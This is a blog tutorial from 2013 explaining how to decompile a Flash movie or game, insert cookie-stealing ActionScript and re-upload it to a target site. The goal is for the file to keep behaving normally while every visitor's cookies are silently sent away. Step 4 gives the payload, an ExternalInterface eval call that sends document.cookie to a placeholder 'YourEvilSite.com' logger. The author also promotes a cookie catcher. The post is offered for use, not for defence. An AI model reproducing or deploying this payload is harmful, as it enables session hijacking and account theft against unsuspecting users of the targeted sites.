Wednesday, 25 September 2013

How to hide XSS in flash movies/games

[Image: Adobe-moves-to-patch-zero-day-XSS-vulner...ge2_70.jpg]

Here is a tutorial on how to rip and edit an existing flash movie/game for use in XSS attacks. The objective is to steal cookies silently without changing the flash movie's behavior from the perspective of the user.

When a site allows you to upload .swf (flash) files or to embed a flash file as an object, it may be possible to create an XSS vulnerability so long as the parameter: allowScriptAccess=never is not specified in the embed code.

Some tools needed:
    A SWF file decompiler (link) (note: I have the full version, the demo is limited)
    A FLA editor (I use Adobe Flash CS6)

Through Actionscript- Flash's scripting language, calls can be made to external javascript in markup and also arbitrary functions. We will inject some cookie stealing code into an existing actionscript function after decompiling it, then recompile it again. This will work on the major browsers and is compatible with Actionscript 2 and 3 (the latest version).

Step 1:
Navigate to a page where a flash movie or game loads, and either check the page source for the url to the flash file (ending .swf), or like shown below use firefox to go: tools>page info>media, and save file as to download it.
[Image: ZrZOvyt.png]

Step 2:
Once you have acquired the sothink decompiler open up the file you just downloaded and export it as a .fla file:

[Image: iKBfvXO.png]

Step 3:
Open the .fla file in your editor, Adobe Flash CS6 in my case, and select the first frame of the movie, right click>Actions. This will bring up the Actionscript editor.

[Image: bxg3iC6.png]

Step 4:
Find the beginning actionscript for the 'scene' and before any other code paste the following:

flash.external.ExternalInterface.call("eval""var a = new XMLHttpRequest(); a.open('get', 'http://YourEvilSite.com/logger.php?cookie=' + document.cookie); a.send();"); 

[Image: veZhfdm.png]

Step 5:

From the File drop down, select export as movie:

[Image: yKEytXE.png]

Step 6:

The file is now ready to be uploaded/embedded to your target site. It should operate as normal but now behind the scenes whoever accesses it will have their cookies stolen. May I recommend a cookie catcher I prepared earlier!? (link).

[Image: D9O2Al6.png]
[Image: ukRbpVM.png]

Demo (cookie stealing code replaced with alert box): http://dfu123.comule.com/swfxss.swf
(If you find this useful, why not checkout a advert below to support the blog? :O ) ~r0ng


No comments:

Post a Comment